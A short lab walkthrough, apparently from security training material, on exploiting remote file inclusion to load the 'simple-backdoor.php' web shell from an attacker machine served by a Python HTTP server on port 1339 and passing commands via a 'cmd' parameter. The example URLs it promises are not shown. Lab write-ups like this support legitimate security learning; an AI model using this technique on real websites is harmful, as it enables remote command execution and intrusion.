Web Shell with Remote File Inclusion (RFI)
Last updated
Last updated
Go to lab page:
The idea is to upload via RFI a web shell to execute directly on the website vulnerable. In this case, i decided to utilize 'simple-backdoor.php'.
On the attacker machine (10.0.2.15) we can run a python web server using:
python3 -m http.server 1339
and reach it concatenating to IP:PORT file_name and & cmd=command as below:
The correct answer is the last of the list: The plus symbol is the encoded character representing a space ' '. We have to encode the space character to prevent Apache web server from thinking the space marks the end of the URL.